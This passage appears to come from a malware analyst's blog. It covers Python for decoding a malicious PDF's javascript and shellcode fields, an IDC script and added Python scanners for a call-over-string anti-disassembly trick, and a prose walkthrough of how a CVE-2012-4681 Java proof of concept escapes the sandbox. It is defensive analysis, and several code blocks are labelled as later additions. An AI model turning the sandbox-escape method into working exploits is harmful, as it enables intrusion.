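def decode_pairs(blob: str, radix: int = 0x1d) -> str:
    """Reverse the /Keywords encoding: chr(parseInt(z[i] + z[i + 1], radix))."""
    if len(blob) % 2:
        raise ValueError("odd length: the stream is truncated or not pair-encoded")
    return "".join(chr(int(blob[i:i + 2], radix)) for i in range(0, len(blob), 2))


def encode_pairs(text: str, radix: int = 0x1d) -> str:
    """Inverse of decode_pairs; handy for building test inputs for a new radix."""
    out = []
    for ch in text:
        code = ord(ch)
        if code >= radix * radix:
            raise ValueError("%r does not fit in two base-%d digits" % (ch, radix))
        out.append(DIGITS[code // radix] + DIGITS[code % radix])
    return "".join(out)


def guess_radix(blob: str, candidates=range(2, 37)) -> int:
    """Try every radix parseInt() accepts and keep the one whose output is
    printable and looks most like javascript (a wrong radix either hits a
    digit that is out of range, yields control/8-bit characters, or yields
    printable garbage without any javascript tokens).  Heuristic, my own."""
    best, best_score = None, -1
    for radix in candidates:
        try:
            text = decode_pairs(blob, radix)
        except ValueError:          # some pair has a digit >= radix
            continue
        if not all(c in string.printable for c in text):
            continue
        score = sum(text.count(tok) for tok in JS_TOKENS)
        if score > best_score:
            best, best_score = radix, score
    if best is None:
        raise ValueError("no radix produced printable output")
    return best


def shellcode_from_creationdate(value: str) -> bytes:
    """The decoded javascript strips commas from creationDate before using it
    (replace(/,/g,'')); do the same and hex-decode the result."""
    return bytes.fromhex(value.replace(",", ""))


if __name__ == "__main__":
    radix = guess_radix(KEYWORDS_PREFIX)
    print("radix 0x%x: %s" % (radix, decode_pairs(KEYWORDS_PREFIX, radix)))
    print("shellcode starts with:",
          shellcode_from_creationdate(CREATIONDATE_PREFIX)[:8].hex())
```

<div class="p1">
<span style="font-family: Verdana, sans-serif;">Run as a script it prints the decoded prefix: in base 29 it starts with app.alert=event.target.creationDate.replace(/,/g,''), which is also how one can tell that /CreationDate is the shellcode carrier. For a full /Keywords value, replace KEYWORDS_PREFIX with the string taken from the decompressed object.</span></div>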
giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-46238969562007990732012-09-29T19:00:00.000-07:002012-09-29T16:58:35.321-07:00Cleaning off anti-disassembly code: the IDC way.<span style="font-family: Verdana, sans-serif;">Every piece of code that can be executed can also be reversed. There are, however, some tricks that make this task more time-consuming, more intricate, and harder to turn into an automated analysis.</span><br />
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">What's the problem? A sequence of executable bytes can be disassembled in many different ways, so disassemblers have to rely on heuristics that, by their nature, have limitations. Anti-disassembly techniques take advantage of them!</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">When executable code is disassembled, each byte belongs to one, and only one, instruction. So, if the disassembler is tricked into starting an instruction at the wrong offset, the instruction it shows won't match the one that is actually executed.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">In this article I will discuss one of these tricks. The trick itself is not a big deal, as it is a well known one, but I found it very annoying when I had to deal with it recently while reversing a malware sample. For this reason, I decided to automate the task of cleaning up the code and developed a little IDC script, based on some assumptions I'm going to explain.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Let's consider a code in the following form:</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">call loc_40106A</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">401050: db 'string01', 0</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">40106A: * assembly instructions *</span><br />
<span style="font-family: Courier New, Courier, monospace;">......: .....</span></div>
<div class="p2">
<br />
<br /></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">It will be disassembled as:</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">call loc_401050+0A</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">401050: * assembly instructions corresponding to the string interpreted as a code *</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">40106A: * assembly instructions *</span><br />
<span style="font-family: Courier New, Courier, monospace;">......: .....</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">(This is an approximate representation: note that the bytes of the string interpreted as opcodes may unalign the instruction at 40106A)</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">The idea behind the trick is very simple: IDA cannot tell text from code and makes a wrong assumption while disassembling the executable. It expects a call to return to the instruction that follows it, so it keeps disassembling from the byte right after the call. It doesn't realize that, following the actual control flow, those bytes are never executed (in this pattern the callee pops the pushed return address and uses it as a pointer to the string) and are therefore only text.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Moreover, it is very annoying from the analyst's perspective: it hides strings, so searching for them is useless, and it produces some weird disassembled instructions that clutter the listing.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">So, what's the idea to clean off the code?</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">First, we search for a near relative call, i.e. the opcode E8 followed by a 32-bit displacement, and assume that the displacement (the following 4 bytes) has a value between 1 and 100. Since the displacement is relative to the end of the call instruction, it is exactly the length of the string that the call jumps over.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Once we find such a case, we undefine the bytes corresponding to the string with "MakeUnknown", and then we use "MakeStr" to recompose the original string correctly.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Unfortunately, even if this procedure solves most cases, it isn't general enough to solve all of them.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Let's consider the following example:</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E2A E8 09 00 00 00 call near ptr loc_403E37+1</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E2F 69 64 65 6E 74 69 74 79 imul esp, [ebp+6Eh], 79746974h</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E37 loc_403E37: </span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E37 00 57 8D add [edi-73h], dl</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E3A 83 8D 28 40 00 FF D0 or dword ptr [ebp-0FFBFD8h], 0FFFFFFD0h</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E41 83 C7 08 add edi, 8</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E44 2B CF sub ecx, edi</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">After the procedure described above, it will become:</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E2A E8 09 00 00 00 call near ptr unk_403E38</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E2F 69 64 65 6E 74 69 74 79+aIdentity db 'identity',0</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E38 57 unk_403E38 db 57h </span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E39 8D db 8Dh </span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E3A 83 8D 28 40 00 FF D0 or dword ptr [ebp-0FFBFD8h], 0FFFFFFD0h</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E41 83 C7 08 add edi, 8</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E44 2B CF sub ecx, edi</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">As you can see, IDA has also undefined some bytes after the string (which should have been legitimate assembly instructions); so, to solve the problem, we may think of going to the end of the string and converting everything back into code with "MakeCode". But is that enough?</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E2A E8 09 00 00 00 call loc_403E38</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E2F 69 64 65 6E 74 69 74 79+aIdentity db 'identity',0</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E38</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E38 loc_403E38: </span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E38 57 push edi</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E39 8D db 8Dh </span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E3A 83 8D 28 40 00 FF D0 or dword ptr [ebp-0FFBFD8h], 0FFFFFFD0h</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E41 83 C7 08 add edi, 8</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E44 2B CF sub ecx, edi</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">No, it isn't! IDA tries to convert the bytes into code, but if they are unaligned it may start from the wrong offset or even fail to complete the task. This happens because IDA originally disassembled the string bytes as code, which dragged the following bytes into bogus instructions like the "</span><span style="font-family: Courier New, Courier, monospace;">or dword ptr [ebp-0FFBFD8h]</span><span style="font-family: Verdana, sans-serif;">" above (the real instruction stream, decoded from the bytes shown, is </span><span style="font-family: Courier New, Courier, monospace;">push edi / lea eax, [ebx+40288Dh] / call eax</span><span style="font-family: Verdana, sans-serif;">). So when you try to realign the code and build the correct instruction starting from the byte "8D", IDA fails: that lea needs the bytes that currently belong to the "or" instruction, and IDA won't split an instruction that already exists.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Even undefining some of the bytes after the string and then converting them back into code doesn't work because, by the nature of the problem, you don't know exactly how many bytes to consider. You can use a heuristic and try with about ten bytes, but this doesn't always give accurate results. Moreover, if there's another call in those ten bytes, things get even worse!</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">The basic idea to solve the problem is to parse the raw bytes manually. I wrote a little IDC script to do that; here is a brief explanation of how it works:</span><br />
<br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">It searches for the "0xE8" byte and takes its operand, that is the length of the string.</span></li>
<li><span style="font-family: Verdana, sans-serif;">It undefines the following "size" bytes and recomposes them as a string.</span></li>
<li><span style="font-family: Verdana, sans-serif;">Then, it iterates the following procedure:</span>
<ol>
<li><span style="font-family: Verdana, sans-serif;">It tries to undefine one byte and to make an instruction from it (when coming back from step <i>3.</i>, the byte is already undefined, so the undefine has no further effect).</span></li>
<li><span style="font-family: Verdana, sans-serif;">If the instruction is made, go back to <i>1.</i> and continue with the bytes after the instruction.</span></li>
<li><span style="font-family: Verdana, sans-serif;">If the instruction wasn't made, undefine one more byte (up to a maximum of 16) in the attempt to make it, and repeat from step <i>1.</i></span></li>
</ol>
</li>
</ul>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In this way, bytes are undefined one at a time and the corresponding instruction is built as soon as possible.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I also assumed that if four consecutive instructions are already interpreted as code, then the bytes are aligned and the work is done. Finally, if any of the recomposed instructions is a call, the algorithm starts over again from it.</span></div>
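<div class="p1">
<span style="font-family: Verdana, sans-serif;">As an added example (my own code, not the script from this post), here is the same search done outside IDA, in Python over raw bytes: it looks for an E8 opcode whose 32-bit displacement is between 1 and 100, as the procedure above does, and adds two checks the procedure leaves out, namely that the bytes the call jumps over are printable text ending in a NUL and that the NUL sits right before the call target, so ordinary near calls are not touched. Each hit records the hidden string and the address where real code resumes, and to_idc() turns the hits into the MakeUnknown/MakeStr statements used above. The sample bytes are rebuilt from the "identity" listing; the control bytes, the printable/NUL checks and the CallOverString record are my additions.</span></div>

```python
"""Added example (not part of the original post): find "call over string"
constructs in raw x86 code without IDA.

Same heuristic as the IDC script in the post (opcode E8 followed by a small
32-bit displacement), plus two checks the script leaves out so that ordinary
near calls are not mistaken for the trick: the bytes the call jumps over must
be printable text ending in a NUL, and that NUL must sit right before the
call target.  The scanner then resumes at the target, i.e. at the real code.
"""
import struct
from typing import List, NamedTuple


class CallOverString(NamedTuple):
    call_ea: int     # address of the E8 opcode
    string: str      # the text hidden behind the call
    resume_ea: int   # the call target, where real code continues


MAX_SIZE = 100       # same upper bound on the displacement as the IDC script


def is_text(buf: bytes) -> bool:
    """Printable ascii (tab/newline allowed) terminated by exactly one NUL."""
    return (len(buf) >= 2 and buf[-1] == 0
            and all(0x20 <= b < 0x7f or b in b"\t\r\n" for b in buf[:-1]))


def find_call_over_string(code: bytes, base: int) -> List[CallOverString]:
    """Scan `code` (loaded at address `base`) for E8 <disp32> calls whose
    displacement, relative to the end of the call, jumps over a C string."""
    hits = []
    i = 0
    while i + 5 <= len(code):
        if code[i] == 0xE8:
            disp = struct.unpack_from("<i", code, i + 1)[0]
            next_ip = i + 5                 # the displacement is relative to here
            end = next_ip + disp
            if 1 < disp < MAX_SIZE and end <= len(code) and is_text(code[next_ip:end]):
                text = code[next_ip:end - 1].decode("ascii")
                hits.append(CallOverString(base + i, text, base + end))
                i = end                     # real code resumes at the call target
                continue
        i += 1
    return hits


def to_idc(hits: List[CallOverString]) -> List[str]:
    """Emit the IDC statements the post uses to turn each hit back into a string."""
    lines = []
    for h in hits:
        str_ea = h.call_ea + 5
        size = h.resume_ea - str_ea
        lines.append("MakeUnknown(0x%08X, %d, DOUNK_DELNAMES);" % (str_ea, size))
        lines.append("MakeStr(0x%08X, 0x%08X);" % (str_ea, h.resume_ea))
    return lines


# constructed sample, rebuilt from the listing in the post (loaded at 403E2Ah):
#   E8 09 00 00 00            call 403E38h        (jumps over the 9 bytes below)
#   'identity',0              the hidden string
#   57 8D 83 8D 28 40 00      push edi / lea eax, [ebx+40288Dh]
#   FF D0 83 C7 08 2B CF      call eax / add edi, 8 / sub ecx, edi
SAMPLE_BASE = 0x403E2A
SAMPLE = (bytes.fromhex("E809000000") + b"identity\0"
          + bytes.fromhex("578D838D284000FFD083C7082BCF"))

# constructed control: a normal call with a large displacement and a call whose
# displacement is small but jumps over NOPs, not text; neither must match
CONTROL = bytes.fromhex("E800100000" "E805000000" "909090909090")

if __name__ == "__main__":
    for hit in find_call_over_string(SAMPLE, SAMPLE_BASE):
        print("%08X: call over %r, code resumes at %08X" % hit)
    print("\n".join(to_idc(find_call_over_string(SAMPLE, SAMPLE_BASE))))
```

<div class="p1">
<span style="font-family: Verdana, sans-serif;">Resuming the scan at the call target matters: the hidden string itself may contain an E8 byte, and skipping over it is what keeps the scanner from reporting a bogus nested call, the same situation that makes the ten-byte heuristic above unreliable.</span></div>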
<div class="p1">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Here is the final script (replace "MIN" and "MAX" with the addresses that bound the code range you want to scan, e.g. MIN = 0x00401000, MAX = 0x00404FFF):</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">auto i, j;</span><br />
<span style="font-family: Courier New, Courier, monospace;">auto Size;</span><br />
<span style="font-family: Courier New, Courier, monospace;">auto Delta, DeltaTemp, DeltaUndef;</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">for(i = MIN; i < MAX; i++) // scan every byte of the chosen range</span><br />
<span style="font-family: Courier New, Courier, monospace;">{</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;if(Byte(i) == 0xE8) // E8 = call rel32 opcode</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;{</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;Size = Dword(i + 1); // the call displacement is the length of the inline string</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;if(Size > 1 && Size < 100) // plausible string length</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;{</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Message(" %08x \n ", i);</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MakeUnknown(i+5, Size, DOUNK_DELNAMES);</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MakeStr(i+5, i+5+Size); // define the bytes after the call as a string</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Delta = 0;</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;DeltaUndef = 0;</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for(j = 0; j < 4; j++) // try to rebuild four consecutive instructions</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(Byte(i+5+Size + Delta) == 0xE8) // another call: the outer loop will handle it</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MakeUnknown(i+5+Size + Delta, 1, DOUNK_DELNAMES);</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;DeltaTemp = MakeCode(i+5+Size + Delta); // returns the instruction length, 0 on failure</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(DeltaTemp != 0)</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Delta = Delta + DeltaTemp;</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;DeltaUndef = 0;</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;j = 0; // restart the count of consecutive instructions</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;DeltaUndef++;</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(DeltaUndef > 16) // give up after undefining 16 bytes</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(Byte(i+5+Size + Delta + DeltaUndef) == 0xE8)</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MakeUnknown(i+5+Size + Delta + DeltaUndef, 1, DOUNK_DELNAMES);</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Message("-- Undef %08x \n", i+5+Size + Delta + DeltaUndef);</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;}</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;}</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">}</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">P.S. I know the code looks twisty and more complicated than it needs to be, but I had to write it this way to bypass some glitches I was having with a couple of IDC APIs.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
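<span style="font-family: Verdana, sans-serif;">An added example, not part of the original post: the construct the script targets (an E8 <i>call</i> whose 32-bit displacement equals the length of a string placed right after it) located with plain Python over a raw code buffer, so the embedded strings and the addresses where real code resumes can be listed without IDA. The byte buffer and the base address are constructed here.</span><br />

```python
"""Locate 'call over an inline string' constructs in a raw code buffer.

The IDC script relies on IDA to rebuild the code after the string; this
stand-alone scanner only finds the construct: E8 rel32 with a small positive
rel32, followed by rel32 bytes of text, after which execution resumes.
Sample bytes below are constructed, not taken from any analysed binary."""
import struct

MAX_INLINE_LEN = 100   # same upper bound the IDC script uses for Size


def _looks_like_text(chunk: bytes) -> bool:
    """Accept printable ASCII, optionally NUL-terminated; reject real code."""
    body = chunk.rstrip(b"\0")
    return len(body) > 0 and all(0x20 <= b < 0x7F for b in body)


def find_call_over_string(code: bytes, base: int = 0x401000):
    """Return (call_va, string, resume_va) for each construct found.

    call_va    address of the E8 byte
    string     the bytes the call jumps over, trailing NULs stripped
    resume_va  where execution continues (the call target)"""
    hits = []
    i = 0
    while i + 5 <= len(code):
        if code[i] == 0xE8:
            size = struct.unpack_from("<I", code, i + 1)[0]
            end = i + 5 + size
            if (1 < size < MAX_INLINE_LEN and end <= len(code)
                    and _looks_like_text(code[i + 5:end])):
                hits.append((base + i, code[i + 5:end].rstrip(b"\0"), base + end))
                i = end            # resume scanning at the call target
                continue
        i += 1
    return hits


# Constructed sample: prologue, two call-over-string constructs, ret.
SAMPLE = (
    b"\x55\x8b\xec"                      # push ebp; mov ebp, esp
    + b"\xe8" + struct.pack("<I", 12)    # call $+5+12: skips the 12 bytes below
    + b"hello world\0"                   # 11 chars + NUL, its address is the pushed return
    + b"\x90\x90"                        # nop; nop (code resumes here)
    + b"\xe8" + struct.pack("<I", 6)     # call $+5+6
    + b"key=1\0"                         # 5 chars + NUL
    + b"\xc3"                            # ret
)

if __name__ == "__main__":
    for call_va, text, resume_va in find_call_over_string(SAMPLE):
        print("call at %#x skips %r, code resumes at %#x" % (call_va, text, resume_va))
```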
giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-8486410581488632172012-08-27T18:25:00.000-07:002012-09-04T17:05:35.319-07:00Analysing CVE-2012-4681 (latest Java 0day)<span style="font-family: Verdana, sans-serif;">Yesterday I spotted the news about a new Java 0day being exploited in the wild and soon after a POC was released: <a href="http://pastie.org/4594319">http://pastie.org/4594319</a>.</span><br />
<span style="font-family: Verdana, sans-serif;">I decided to analyse this code to understand what is the vulnerability that triggers the exploit. Here is a brief description of my findings.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The code instantiates a <i>Statement</i> object that will be used to run the <i>setSecurityManager()</i> method of the <i>System</i> class. The purpose is to set the Security Manager to null, which means escaping the Java sandbox. Of course, you can't do this directly and here comes the exploit!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The <i>Statement</i> object contains a field named "acc", which is an <i>AccessControlContext</i> (a sort of security descriptor) that specifies the permissions granted to the <i>Statement</i> object itself. This field is normally not accessible from code outside the <i>Statement</i> class, so the exploit needs to find a way to modify it.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">It does so by using the <i>getField()</i> method of the <i>sun.awt.SunToolkit</i> class: this function returns a given field of a given object; in this case it returns <i>Statement.acc</i>. At this point the game is over, because the malicious code can just create a new <i>AccessControlContext</i> object, assign it full permissions and then replace the old restricted <i>Statement.acc</i> with the new unrestricted one.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Mystery solved? Not yet: the tricky part is obtaining a reference to <i>sun.awt.SunToolkit</i>, which lives in a package that is supposed to be restricted. The exploit does this by calling <i>Class.forName()</i>; this method simply returns a class object given its name.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This is how I understand the code (and I'm no Java expert), but I read <a href="http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html">this blog entry</a> that has a slightly different explanation. In their analysis, the authors see another method that accomplishes the task: <i>com.sun.beans.finder.ClassFinder</i>.</span><br />
<span style="font-family: Verdana, sans-serif;">I don't know what this is about: do they have a different POC or sample? It does seem so!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Also, they say that the exploit itself relies on the possibility of obtaining the <i>sun.awt.SunToolkit</i> class through the <i>com.sun.beans.finder.ClassFinder</i> class. This would mean that in the POC I have analysed the vulnerability is in the <i>Class.forName()</i> method, that is, there are TWO different vulnerabilities (one in <i>ClassFinder</i> and one in <i>Class.forName()</i>).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">However, when I debugged the exploit on Java version 1.6 (jre6) it did not work: the <i>Class.forName()</i> call successfully obtained the <i>sun.awt.SunToolkit</i> class, but the subsequent call to its <i>getField()</i> method threw an exception. The same method works fine in version 1.7 (jre7). In short:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
